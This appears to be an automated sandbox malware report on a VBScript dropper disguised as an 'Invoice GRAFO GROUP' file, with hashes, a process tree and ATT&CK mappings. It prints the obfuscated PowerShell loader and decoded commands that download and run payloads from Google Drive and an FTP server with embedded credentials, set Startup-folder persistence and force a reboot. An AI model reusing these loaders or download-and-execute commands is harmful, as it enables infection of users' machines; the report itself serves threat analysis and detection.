c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09

General

Target

Invoice GRAFO GROUP MQ 26.07.2024.vbs
Size

689KB
MD5

87f27580d805863d210331653ca944a7
SHA1

d861804f8fa941e95f8f779a295ffb0812ba2d4e
SHA256

c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09
SHA512

eb895266a5774eefbc9ac6b30612a42a0d331fac221875fd9c59a67110880716ba7c7c890eb969f531dcfcff4a2c71cfdcab1c35116ec4d56de8cbf7e1a25d64
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE777777777777777777777777777777777777772:uK

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Invoice GRAFO GROUP MQ 26.07.2024.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Invoice GRAFO GROUP MQ 26.07.2024.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2712	powershell.exe
580	powershell.exe
1444	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2712	powershell.exe
580	powershell.exe
2644	powershell.exe
1444	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	580	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2792 wrote to memory of 2712	2792	WScript.exe	31
PID 2792 wrote to memory of 2712	2792	WScript.exe	31
PID 2792 wrote to memory of 2712	2792	WScript.exe	31
PID 2712 wrote to memory of 580	2712	powershell.exe	33
PID 2712 wrote to memory of 580	2712	powershell.exe	33
PID 2712 wrote to memory of 580	2712	powershell.exe	33
PID 580 wrote to memory of 2644	580	powershell.exe	34
PID 580 wrote to memory of 2644	580	powershell.exe	34
PID 580 wrote to memory of 2644	580	powershell.exe	34
PID 2644 wrote to memory of 2144	2644	powershell.exe	35
PID 2644 wrote to memory of 2144	2644	powershell.exe	35
PID 2644 wrote to memory of 2144	2644	powershell.exe	35
PID 580 wrote to memory of 1444	580	powershell.exe	36
PID 580 wrote to memory of 1444	580	powershell.exe	36
PID 580 wrote to memory of 1444	580	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice GRAFO GROUP MQ 26.07.2024.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9せㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしDEせㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしnせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしCcせㅚしaせㅚしB0せㅚしHQせㅚしcせㅚしBzせㅚしDoせㅚしLwせㅚしvせㅚしHcせㅚしdwB3せㅚしC4せㅚしbQBlせㅚしGQせㅚしaQBhせㅚしGYせㅚしaQByせㅚしGUせㅚしLgBjせㅚしG8せㅚしbQせㅚしvせㅚしGYせㅚしaQBsせㅚしGUせㅚしXwBwせㅚしHIせㅚしZQBtせㅚしGkせㅚしdQBtせㅚしC8せㅚしZwせㅚし2せㅚしG0せㅚしZQBnせㅚしGoせㅚしNwせㅚし3せㅚしGMせㅚしbQBlせㅚしHgせㅚしeせㅚしBnせㅚしDgせㅚしLwBhせㅚしGcせㅚしdQせㅚしuせㅚしHQせㅚしeせㅚしB0せㅚしC8せㅚしZgBpせㅚしGwせㅚしZQせㅚしnせㅚしCせㅚしせㅚしKせㅚしせㅚしgせㅚしF0せㅚしXQBbせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBvせㅚしFsせㅚしIせㅚしせㅚしsせㅚしCせㅚしせㅚしbせㅚしBsせㅚしHUせㅚしbgせㅚしkせㅚしCせㅚしせㅚしKせㅚしBlせㅚしGsせㅚしbwB2せㅚしG4せㅚしSQせㅚしuせㅚしCkせㅚしIせㅚしせㅚしnせㅚしEkせㅚしVgBGせㅚしHIせㅚしcせㅚしせㅚしnせㅚしCせㅚしせㅚしKせㅚしBkせㅚしG8せㅚしaせㅚしB0せㅚしGUせㅚしTQB0せㅚしGUせㅚしRwせㅚしuせㅚしCkせㅚしJwせㅚしxせㅚしHMせㅚしcwBhせㅚしGwせㅚしQwせㅚしuせㅚしDMせㅚしeQByせㅚしGEせㅚしcgBiせㅚしGkせㅚしTせㅚしBzせㅚしHMせㅚしYQBsせㅚしEMせㅚしJwせㅚしoせㅚしGUせㅚしcせㅚしB5せㅚしFQせㅚしdせㅚしBlせㅚしEcせㅚしLgせㅚしpせㅚしCせㅚしせㅚしeせㅚしBtせㅚしHoせㅚしWせㅚしB4せㅚしCQせㅚしIせㅚしせㅚしoせㅚしGQせㅚしYQBvせㅚしEwせㅚしLgBuせㅚしGkせㅚしYQBtせㅚしG8せㅚしRせㅚしB0せㅚしG4せㅚしZQByせㅚしHIせㅚしdQBDせㅚしDoせㅚしOgBdせㅚしG4せㅚしaQBhせㅚしG0せㅚしbwBEせㅚしHせㅚしせㅚしcせㅚしBBせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚし7せㅚしCkせㅚしIせㅚしせㅚしpせㅚしCせㅚしせㅚしJwBBせㅚしCcせㅚしIせㅚしせㅚしsせㅚしCせㅚしせㅚしJwCTIToせㅚしkyEnせㅚしCせㅚしせㅚしKせㅚしBlせㅚしGMせㅚしYQBsせㅚしHせㅚしせㅚしZQBSせㅚしC4せㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしIせㅚしせㅚしoせㅚしGcせㅚしbgBpせㅚしHIせㅚしdせㅚしBTせㅚしDQせㅚしNgBlせㅚしHMせㅚしYQBCせㅚしG0せㅚしbwByせㅚしEYせㅚしOgせㅚし6せㅚしF0せㅚしdせㅚしByせㅚしGUせㅚしdgBuせㅚしG8せㅚしQwせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしeせㅚしBtせㅚしHoせㅚしWせㅚしB4せㅚしCQせㅚしIせㅚしBdせㅚしF0せㅚしWwBlせㅚしHQせㅚしeQBCせㅚしFsせㅚしOwせㅚしnせㅚしCUせㅚしSQBoせㅚしHEせㅚしUgBYせㅚしCUせㅚしJwせㅚしgせㅚしD0せㅚしIせㅚしBlせㅚしGoせㅚしdwB6せㅚしGgせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZwBuせㅚしGkせㅚしcgB0せㅚしFMせㅚしZせㅚしBhせㅚしG8せㅚしbせㅚしBuせㅚしHcせㅚしbwBEせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしOwせㅚし4せㅚしEYせㅚしVせㅚしBVせㅚしDoせㅚしOgBdせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHQせㅚしeせㅚしBlせㅚしFQせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQB0せㅚしG4せㅚしZQBpせㅚしGwせㅚしQwBiせㅚしGUせㅚしVwせㅚしuせㅚしHQせㅚしZQBOせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしE8せㅚしLQB3せㅚしGUせㅚしTgせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQせㅚしoせㅚしGUせㅚしcwBvせㅚしHせㅚしせㅚしcwBpせㅚしGQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしせㅚしnせㅚしHQせㅚしeせㅚしB0せㅚしC4せㅚしMQせㅚしwせㅚしEwせㅚしTせㅚしBEせㅚしC8せㅚしMQせㅚしwせㅚしC8せㅚしcgBlせㅚしHQせㅚしcせㅚしB5せㅚしHIせㅚしYwBwせㅚしFUせㅚしLwByせㅚしGIせㅚしLgBtせㅚしG8せㅚしYwせㅚしuせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしLgBwせㅚしHQせㅚしZgBせㅚしせㅚしDEせㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしvせㅚしC8せㅚしOgBwせㅚしHQせㅚしZgせㅚしnせㅚしCせㅚしせㅚしKせㅚしBnせㅚしG4せㅚしaQByせㅚしHQせㅚしUwBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚし7せㅚしCkせㅚしJwBせㅚしせㅚしEせㅚしせㅚしcせㅚしBKせㅚしDgせㅚしNwせㅚし1せㅚしDEせㅚしMgBvせㅚしHIせㅚしcせㅚしByせㅚしGUせㅚしcせㅚしBvせㅚしGwせㅚしZQB2せㅚしGUせㅚしZせㅚしせㅚしnせㅚしCwせㅚしJwせㅚしxせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしJwせㅚしoせㅚしGwせㅚしYQBpせㅚしHQせㅚしbgBlせㅚしGQせㅚしZQByせㅚしEMせㅚしawByせㅚしG8せㅚしdwB0せㅚしGUせㅚしTgせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしbwせㅚしtせㅚしHcせㅚしZQBuせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHMせㅚしbせㅚしBhせㅚしGkせㅚしdせㅚしBuせㅚしGUせㅚしZせㅚしBlせㅚしHIせㅚしQwせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしOせㅚしBGせㅚしFQせㅚしVQせㅚし6せㅚしDoせㅚしXQBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgB0せㅚしHgせㅚしZQBUせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしdせㅚしBuせㅚしGUせㅚしaQBsせㅚしEMせㅚしYgBlせㅚしFcせㅚしLgB0せㅚしGUせㅚしTgせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBPせㅚしC0せㅚしdwBlせㅚしE4せㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしDsせㅚしMgせㅚしxせㅚしHMせㅚしbせㅚしBUせㅚしDoせㅚしOgBdせㅚしGUせㅚしcせㅚしB5せㅚしFQせㅚしbせㅚしBvせㅚしGMせㅚしbwB0せㅚしG8せㅚしcgBQせㅚしHkせㅚしdせㅚしBpせㅚしHIせㅚしdQBjせㅚしGUせㅚしUwせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBsせㅚしG8せㅚしYwBvせㅚしHQせㅚしbwByせㅚしFせㅚしせㅚしeQB0せㅚしGkせㅚしcgB1せㅚしGMせㅚしZQBTせㅚしDoせㅚしOgBdせㅚしHIせㅚしZQBnせㅚしGEせㅚしbgBhせㅚしE0せㅚしdせㅚしBuせㅚしGkせㅚしbwBQせㅚしGUせㅚしYwBpせㅚしHYせㅚしcgBlせㅚしFMせㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしOwB9せㅚしGUせㅚしdQByせㅚしHQせㅚしJせㅚしB7せㅚしCせㅚしせㅚしPQせㅚしgせㅚしGsせㅚしYwBhせㅚしGIせㅚしbせㅚしBsせㅚしGEせㅚしQwBuせㅚしG8せㅚしaQB0せㅚしGEせㅚしZせㅚしBpせㅚしGwせㅚしYQBWせㅚしGUせㅚしdせㅚしBhせㅚしGMせㅚしaQBmせㅚしGkせㅚしdせㅚしByせㅚしGUせㅚしQwByせㅚしGUせㅚしdgByせㅚしGUせㅚしUwせㅚし6せㅚしDoせㅚしXQByせㅚしGUせㅚしZwBhせㅚしG4せㅚしYQBNせㅚしHQせㅚしbgBpせㅚしG8せㅚしUせㅚしBlせㅚしGMせㅚしaQB2せㅚしHIせㅚしZQBTせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしHsせㅚしIせㅚしBlせㅚしHMせㅚしbせㅚしBlせㅚしH0せㅚしIせㅚしBmせㅚしC8せㅚしIせㅚしせㅚしwせㅚしCせㅚしせㅚしdせㅚしせㅚしvせㅚしCせㅚしせㅚしcgせㅚしvせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBuせㅚしHcせㅚしbwBkせㅚしHQせㅚしdQBoせㅚしHMせㅚしIせㅚしせㅚし7せㅚしCcせㅚしMせㅚしせㅚし4せㅚしDEせㅚしIせㅚしBwせㅚしGUせㅚしZQBsせㅚしHMせㅚしJwせㅚしgせㅚしGQせㅚしbgBhせㅚしG0せㅚしbQBvせㅚしGMせㅚしLQせㅚしgせㅚしGUせㅚしeせㅚしBlせㅚしC4せㅚしbせㅚしBsせㅚしGUせㅚしaせㅚしBzせㅚしHIせㅚしZQB3せㅚしG8せㅚしcせㅚしせㅚし7せㅚしCせㅚしせㅚしZQBjせㅚしHIせㅚしbwBmせㅚしC0せㅚしIせㅚしせㅚしpせㅚしCせㅚしせㅚしJwBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしFwせㅚしcwBtせㅚしGEせㅚしcgBnせㅚしG8せㅚしcgBQせㅚしFwせㅚしdQBuせㅚしGUせㅚしTQせㅚしgせㅚしHQせㅚしcgBhせㅚしHQせㅚしUwBcせㅚしHMせㅚしdwBvせㅚしGQせㅚしbgBpせㅚしFcせㅚしXせㅚしB0せㅚしGYせㅚしbwBzせㅚしG8せㅚしcgBjせㅚしGkせㅚしTQBcせㅚしGcせㅚしbgBpせㅚしG0せㅚしYQBvせㅚしFIせㅚしXせㅚしBhせㅚしHQせㅚしYQBEせㅚしHせㅚしせㅚしcせㅚしBBせㅚしFwせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしGQせㅚしbせㅚしBvせㅚしEYせㅚしJせㅚしせㅚしgせㅚしCgせㅚしIせㅚしBuせㅚしG8せㅚしaQB0せㅚしGEせㅚしbgBpせㅚしHQせㅚしcwBlせㅚしEQせㅚしLQせㅚしgせㅚしCcせㅚしJQBJせㅚしGgせㅚしcQBSせㅚしFgせㅚしJQせㅚしnせㅚしCせㅚしせㅚしbQBlせㅚしHQせㅚしSQせㅚしtせㅚしHkせㅚしcせㅚしBvせㅚしEMせㅚしIせㅚしせㅚし7せㅚしCせㅚしせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBzせㅚしGUせㅚしcgBvせㅚしG4せㅚしLwせㅚしgせㅚしHQせㅚしZQBpせㅚしHUせㅚしcQせㅚしvせㅚしCせㅚしせㅚしZQBsせㅚしGkせㅚしZgせㅚしkせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBhせㅚしHMせㅚしdQB3せㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBsせㅚしGwせㅚしZQBoせㅚしHMせㅚしcgBlせㅚしHcせㅚしbwBwせㅚしCせㅚしせㅚしOwせㅚしpせㅚしCcせㅚしdQBzせㅚしG0せㅚしLgBuせㅚしGkせㅚしdwBwせㅚしFUせㅚしXせㅚしせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGEせㅚしdせㅚしBzせㅚしGEせㅚしcせㅚしせㅚしkせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZQBsせㅚしGkせㅚしZgせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしGUせㅚしbQBhせㅚしE4せㅚしcgBlせㅚしHMせㅚしVQせㅚし6せㅚしDoせㅚしXQB0せㅚしG4せㅚしZQBtせㅚしG4せㅚしbwByせㅚしGkせㅚしdgBuせㅚしEUせㅚしWwせㅚしgせㅚしCsせㅚしIせㅚしせㅚしnせㅚしFwせㅚしcwByせㅚしGUせㅚしcwBVせㅚしFwせㅚしOgBDせㅚしCcせㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしGQせㅚしbせㅚしBvせㅚしEYせㅚしJせㅚしせㅚし7せㅚしCkせㅚしJwB1せㅚしHMせㅚしbQせㅚしuせㅚしG4せㅚしaQB3せㅚしHせㅚしせㅚしVQBcせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしYQB0せㅚしHMせㅚしYQBwせㅚしCQせㅚしIせㅚしせㅚしsせㅚしEIせㅚしSwBMせㅚしFIせㅚしVQせㅚしkせㅚしCgせㅚしZQBsせㅚしGkせㅚしRgBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBwせㅚしFkせㅚしUwB3せㅚしGYせㅚしJせㅚしせㅚし7せㅚしDgせㅚしRgBUせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしdせㅚしB4せㅚしGUせㅚしVせㅚしせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしcせㅚしBZせㅚしFMせㅚしdwBmせㅚしCQせㅚしOwせㅚしpせㅚしHQせㅚしbgBlせㅚしGkせㅚしbせㅚしBDせㅚしGIせㅚしZQBXせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしTwせㅚしtせㅚしHcせㅚしZQBOせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしcせㅚしBZせㅚしFMせㅚしdwBmせㅚしCQせㅚしOwB9せㅚしDsせㅚしIせㅚしせㅚしpせㅚしCcせㅚしcgBnせㅚしDgせㅚしRせㅚしせㅚし3せㅚしG8せㅚしUgBzせㅚしGYせㅚしVgBjせㅚしHIせㅚしMgBuせㅚしEEせㅚしaせㅚしBmせㅚしGgせㅚしVgせㅚし2せㅚしEQせㅚしQwB4せㅚしFIせㅚしcQBuせㅚしHEせㅚしagせㅚし1せㅚしGoせㅚしcgBiせㅚしDEせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBwせㅚしEgせㅚしQQBTせㅚしGgせㅚしJせㅚしせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHせㅚしせㅚしSせㅚしBBせㅚしFMせㅚしaせㅚしせㅚしkせㅚしHsせㅚしIせㅚしBlせㅚしHMせㅚしbせㅚしBlせㅚしH0せㅚしOwせㅚしgせㅚしCkせㅚしJwB4せㅚしDQせㅚしZgBoせㅚしFoせㅚしTQB3せㅚしE4せㅚしNwBVせㅚしGUせㅚしXwせㅚしwせㅚしF8せㅚしNQBfせㅚしGkせㅚしYwBzせㅚしGIせㅚしaせㅚしせㅚし3せㅚしEMせㅚしUせㅚしせㅚしwせㅚしEkせㅚしZgBQせㅚしGQせㅚしQQせㅚしyせㅚしDEせㅚしMQせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしHせㅚしせㅚしSせㅚしBBAFMAaAAkACgAIAA9ACAAcABIAEEAUwBoACQAewAgACkAdgBmAFkAVABIACQAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdgBmAFkAVABIACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAHAASABBAFMAaAAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAGIASgBHAHAAUgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABiAEoARwBwAFIAJAAgADsA';$ziISm = $qCybe.replace('せㅚし' , 'A') ;$bQOzu = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $ziISm ) ); $bQOzu = $bQOzu[-1..-$bQOzu.Length] -join '';$bQOzu = $bQOzu.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Invoice GRAFO GROUP MQ 26.07.2024.vbs');powershell $bQOzu
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $RpGJb = $host.Version.Major.Equals(2) ;if ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($HTYfv) {$hSAHp = ($hSAHp + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient);$fwSYp.Encoding = [System.Text.Encoding]::UTF8;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Invoice GRAFO GROUP MQ 26.07.2024.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$CSaXQ.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $CSaXQ.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$CSaXQ.dispose();$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $CSaXQ.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\Invoice GRAFO GROUP MQ 26.07.2024.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'elif/txt.uga/8gxxemc77jgem6g/muimerp_elif/moc.erifaidem.www//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2644
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c75fdadcdf1341fb38ca00834483eb35

SHA1
08d7dfd2fdb339f6e31160b8582f3cb5a610cf98

SHA256
99cb2f0ed277d0e41dd4d24876b469913bfa2d49f22806145a38c6bec67810fe

SHA512
f6d86136254287a28efd40507f5dd0f1076cb0eb1dbda8587090df9417478a5ec2294ac9cc43208422247eddb99b251a46fcaa86c289e52dd6ab93b9b37d18f5

Download Submit
memory/2712-4-0x000007FEF604E000-0x000007FEF604F000-memory.dmp

Filesize
4KB

Download
memory/2712-6-0x0000000002350000-0x0000000002358000-memory.dmp

Filesize
32KB

Download
memory/2712-5-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/2712-8-0x000007FEF5D90000-0x000007FEF672D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-7-0x000007FEF5D90000-0x000007FEF672D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-9-0x000007FEF5D90000-0x000007FEF672D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-15-0x000007FEF5D90000-0x000007FEF672D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-28-0x000007FEF5D90000-0x000007FEF672D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing